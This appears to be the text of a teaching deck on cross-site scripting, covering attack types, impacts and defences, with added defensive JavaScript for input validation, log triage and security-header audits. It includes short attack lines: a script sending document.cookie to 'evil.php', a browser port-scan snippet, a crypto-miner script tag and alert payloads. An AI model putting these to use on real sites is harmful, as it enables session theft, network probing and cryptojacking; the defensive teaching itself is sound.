3. Cross-Site Scripting (XSS)
Malicious scripts are injected into otherwise benign and trusted web sites
The web application uses input within the output it generates without validating or encoding it
Bypass the same-origin policy
~20 years old
OWASP TOP 10 – 2017: A7
5. XSS mechanics
There are three types of XSS attack:
Stored (AKA Persistent)
Reflected (AKA Non-Persistent)
DOM Based (AKA Client Side XSS)
6. Stored XSS
User input is stored on the target server.
A victim retrieves the stored data from the web application without that data being made safe to render in the browser.
7. Reflected XSS
The data is not stored permanently on the server.
User input is immediately returned by a Web application in response.
8. DOM Based XSS
The attack payload is executed as a result of modifying the DOM (Document Object Model) in the victim's browser.
The page itself (the HTTP response) does not change.
Example: <script> document.write("<b>Current URL</b> : " + document.location.href); </script>
11. Samy worm
The fastest-spreading computer virus of all time
12. XSS – what can attackers do?
Session hijacking
Phishing
Defacements
Installation of Trojan horses
Browser exploits
Port scanning
DDoS attacks
Crypto miner$
13. Session hijacking
Cookie based authentication
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
14. Phishing
This technique is by far the most successful on the Internet today.
Most methods use a link that leads to a spoofed website:
Misspelled URLs
Subdomains:
http://www.yourbank.malicious.com
Covert redirect:
http://www.yourbank.example.com/?redirect=http://www.malicious.com
15. Phishing with XSS
Why are XSS Phishing attacks particularly problematic?
They direct the user to sign in at the service's own web page, where everything from the Web address to the SSL certificate is valid.
17. Port scanning
Probe a server or host for open ports
Often used by attackers to identify network services running on a host and exploit vulnerabilities
Did you know that you can perform a port scan via JavaScript?
18. Port scanning via XSS
The victim's workstation is used as a stepping stone to attack other systems.
An XSS flaw can lead to a full network compromise.
window.onerror = handleError;
var newScript = document.createElement('script');
newScript.src = 'http://' + host + ':' + port; // host and port are the values being probed

function handleError(message, url, line)
{
  // the error message the browser reports differs depending on whether the port answered
  if (message.match(/Script error|Error loading script/))
  {
    // Open!
  }
}
19. Persistent XSS Enables Large-Scale DDoS Attack
Sohu.com - 27th most visited website in the world
Attack: 20 million GET requests originating from 22,000 browsers
Sophisticated code that keeps track of the attack for billing purposes
20. XSS crypto miners
Any site with stored XSS is exposed to JavaScript crypto-mining malware (e.g. Monero miners).
"An XSS exploit in our KaTeX parser was used to embed a JavaScript crypto miner in clients via an exploitative message."
100% CPU?
Coinhive:
Cryptocurrency mining service
Identified by multiple security firms as the top malicious threat to Web users
Keeps 30% of whatever amount of Monero is mined using its code, whether or not a Web site has given consent to run it.
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
22. Input validation
Trust no one - all input must be validated:
On the server side!
Client-side validation can only serve as a second line of defense.
Validate pattern (e.g. credit card number), characters and length.
Strategy:
1. Whitelisting: [A-Za-z0-9]*
2. Greylisting: .*[<>].*
3. Blacklisting: <script>alert(1)</script>
Input validation is not the primary safeguard against Cross-Site Scripting.
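The three strategies on this slide as runnable predicates, plus the pattern/length check the slide mentions for a credit card number. This is an added example, not code from the slides; the sample inputs are constructed, and the blacklist is deliberately the slide's single literal payload so that its weakness is visible: a value the whitelist accepts is safe by construction, whereas a blacklist only rejects what it was told about.

```javascript
// Added example (not from the slides): the three validation strategies as predicates.

// Whitelisting: accept only what is known to be good. The whole value must match.
const WHITELIST = /^[A-Za-z0-9]*$/;

// Greylisting: flag values containing characters with special meaning in HTML.
const GREYLIST = /.*[<>].*/;

// Blacklisting: reject one known-bad pattern (the literal payload from the slide).
const BLACKLIST = /<script>alert\(1\)<\/script>/;

function validateWhitelist(value) { return WHITELIST.test(value); }
function validateGreylist(value) { return !GREYLIST.test(value); }
function validateBlacklist(value) { return !BLACKLIST.test(value); }

// Generic field check: length first, then the allowed pattern/characters.
function validateField(value, { pattern, maxLength }) {
  if (typeof value !== 'string') return false;
  if (value.length > maxLength) return false;
  return pattern.test(value);
}

// Constructed rule for a card number: 13-19 digits, nothing else.
const CARD_NUMBER = { pattern: /^[0-9]{13,19}$/, maxLength: 19 };

// Constructed sample inputs: a plain username, the slide's payload, a trivial
// variant of that payload, and a legitimate name containing an apostrophe.
const SAMPLES = [
  'john99',
  '<script>alert(1)</script>',
  '<script>alert(2)</script>',
  "O'Brien",
];

// Run every strategy over every sample and return the verdicts side by side.
function evaluate(samples = SAMPLES) {
  return samples.map((value) => ({
    value,
    whitelist: validateWhitelist(value),
    greylist: validateGreylist(value),
    blacklist: validateBlacklist(value),
  }));
}

console.table(evaluate());
```

The table shows the trade-off the slide alludes to: the whitelist rejects both payloads but also the name with the apostrophe, the greylist rejects anything carrying angle brackets, and the blacklist lets the second payload through because it only matches the exact string it was given.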
25. Output encoding
Convert untrusted input into a safe form
Display data without executing as code in the browser
Needs to occur within a specific context:
HTML
JavaScript
URL
CSS
In addition to input validation
26. Output encoding – HTML context
HTML encoding:
When you want to put untrusted data directly into the HTML body
HTML attribute encoding:
This should not be used for complex attributes like href, src, style, or any of the event handlers like onmouseover.
27. Output encoding – JavaScript context
JavaScript encoding:
For dynamically generated JavaScript code
It is extremely easy to switch into an execution context => use with caution!
Some JS functions can never safely use untrusted data as input - EVEN IF JAVASCRIPT ESCAPED!
Can we use \ to escape special characters?
Escape the escape: " => \"
Escape all non-alphanumeric characters with \xHH: " => \x22
28. Log everything!
2018-03-19 15:10:26,697 - login - INFO - User John logged out.
2018-03-19 15:10:26,697 - login - ERROR - User <script>alert('xss');</script> entered incorrect password.
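A small triage routine over log lines in the format shown on this slide: it parses each line, flags entries whose free-text part carries markup (an attempted payload that was logged, as in the second line above), and neutralises such messages before they are shown in an HTML-based log viewer, where a logged payload could otherwise execute. This is an added example, not code from the slides; the sample lines are constructed copies of the two on the slide plus one extra, and the newline stripping goes slightly beyond the slide (it keeps a logged value from forging additional log lines).

```javascript
// Added example (not from the slides): parse, flag and neutralise log entries.

// Format on the slide: "<timestamp> - <logger> - <LEVEL> - <message>".
const LOG_LINE =
  /^(?<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) - (?<logger>\S+) - (?<level>[A-Z]+) - (?<message>.*)$/;

// Constructed sample lines modelled on the slide.
const SAMPLE_LOG = [
  '2018-03-19 15:10:26,697 - login - INFO - User John logged out.',
  "2018-03-19 15:10:26,697 - login - ERROR - User <script>alert('xss');</script> entered incorrect password.",
  '2018-03-19 15:10:27,001 - login - INFO - User Mary logged in.',
];

// Returns the named fields, or null when the line does not match the format.
function parseLogLine(line) {
  const m = LOG_LINE.exec(line);
  return m ? { ...m.groups } : null;
}

// Angle brackets in a log message mean a user-controlled value carried markup.
function hasMarkup(text) {
  return /[<>]/.test(text);
}

// Make a message safe to place in an HTML viewer and keep it to one log line.
function neutralize(text) {
  return text
    .replace(/[\r\n]/g, ' ')
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Collect the suspicious entries with a display-safe copy of their message.
function triage(lines) {
  const suspicious = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (entry && hasMarkup(entry.message)) {
      suspicious.push({ ts: entry.ts, level: entry.level, rendered: neutralize(entry.message) });
    }
  }
  return suspicious;
}

console.log(triage(SAMPLE_LOG));
```

Run it over a real log file by replacing `SAMPLE_LOG` with the file's lines; lines that do not match the expected format are skipped rather than guessed at.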
29. HTTPOnly cookie flag
Preventing all XSS flaws in an application is hard => protect cookies from XSS attacks!
HttpOnly cookies are inaccessible to JavaScript's Document.cookie API.
An additional flag included in a Set-Cookie HTTP response header:
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
30. Content Security Policy (CSP)
"Defense in depth" technique against content injection attacks
A declarative policy that controls resources the browser is allowed to load
Requires browser support (supported by most)
Content-Security-Policy HTTP header:
Content-Security-Policy: default-src 'none'; script-src 'self'; img-src 'self'; style-src 'self';
Allows images, scripts, and CSS from the same origin. No other resources can load.
32. X-XSS-Protection
The browser detects reflected cross-site scripting attacks
Provides protections for older web browsers that don't support CSP
Syntax:
X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>
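A response-header audit covering the three headers from the preceding slides: it parses a `Set-Cookie` value and reports a missing `HttpOnly` or `Secure` flag, parses a `Content-Security-Policy` value into its directives and reports a missing `default-src` fallback or an overly permissive `script-src`, and parses the legacy `X-XSS-Protection` value. This is an added example, not code from the slides; the header values in the sample are the ones on the slides plus constructed weak variants, and the function names are assumptions.

```javascript
// Added example (not from the slides): audit of Set-Cookie, CSP and X-XSS-Protection.

// "name=value; Attr; Attr=value" -> { name, value, attributes: { attr: value|true } }
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes: {} };
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

// Findings for a session cookie: it should be unreadable from script and HTTPS-only.
function auditCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attributes.httponly) findings.push(`${c.name}: missing HttpOnly`);
  if (!c.attributes.secure) findings.push(`${c.name}: missing Secure`);
  return findings;
}

// "directive src src; directive src" -> { directive: [src, ...] }
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(';')) {
    const parts = directive.trim().split(/\s+/).filter(Boolean);
    if (parts.length === 0) continue;
    const [name, ...sources] = parts;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Findings for a CSP: no fallback, or script sources that defeat the point of CSP.
function auditCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  if (!policy['default-src']) findings.push('no default-src fallback');
  const scripts = policy['script-src'] || policy['default-src'] || [];
  if (scripts.includes("'unsafe-inline'")) findings.push("script-src allows 'unsafe-inline'");
  if (scripts.includes('*')) findings.push('script-src allows any origin');
  return findings;
}

// "0" | "1" | "1; mode=block" | "1; report=<uri>" -> { enabled, mode?, report? }
function parseXssProtection(header) {
  const [flag, ...rest] = header.split(';').map((s) => s.trim());
  const result = { enabled: flag === '1' };
  for (const option of rest) {
    if (!option) continue;
    const [key, value] = option.split('=');
    result[key.trim()] = value === undefined ? true : value.trim();
  }
  return result;
}

// Constructed sample: the slide's values next to weaker variants.
const SAMPLE = {
  goodCookie: 'id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly',
  weakCookie: 'id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT',
  goodCsp: "default-src 'none'; script-src 'self'; img-src 'self'; style-src 'self';",
  weakCsp: "script-src 'self' 'unsafe-inline'",
};

console.log(auditCookie(SAMPLE.goodCookie), auditCookie(SAMPLE.weakCookie));
console.log(auditCsp(SAMPLE.goodCsp), auditCsp(SAMPLE.weakCsp));
console.log(parseXssProtection('1; mode=block'));
```

An empty findings list means the header matches what the slides recommend; anything else names the flag or directive to add. The header name itself (`Set-Cookie:`, `Content-Security-Policy:`) is stripped before calling these functions, which take only the value.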
33. Framework security
Address security while choosing a new technology/framework.
Angular:
All values are treated as untrusted by default.
Interpolated content is always escaped:
HTML properties - unsafe values are recognized and sanitized automatically:
34. Dynamic analysis
Hack yourself!
Works best when combined with some manual testing.
Open source tools:
OWASP ZAP
Burp free
Grabber
36. Static analysis
Examine the code without executing the program.
Reveals hidden vulnerabilities that dynamic or manual testing/code review do not detect.
High number of False Positives: for some tools, up to 85%!
Do not try to reproduce every reported vulnerability!
37. Web Application Firewall (WAF)
A reverse proxy that filters, monitors, and blocks HTTP traffic:
Appliance
Server plugin
Cloud
False Positives and False Negatives
Customization and maintenance
Great for zero-day attacks
An additional security layer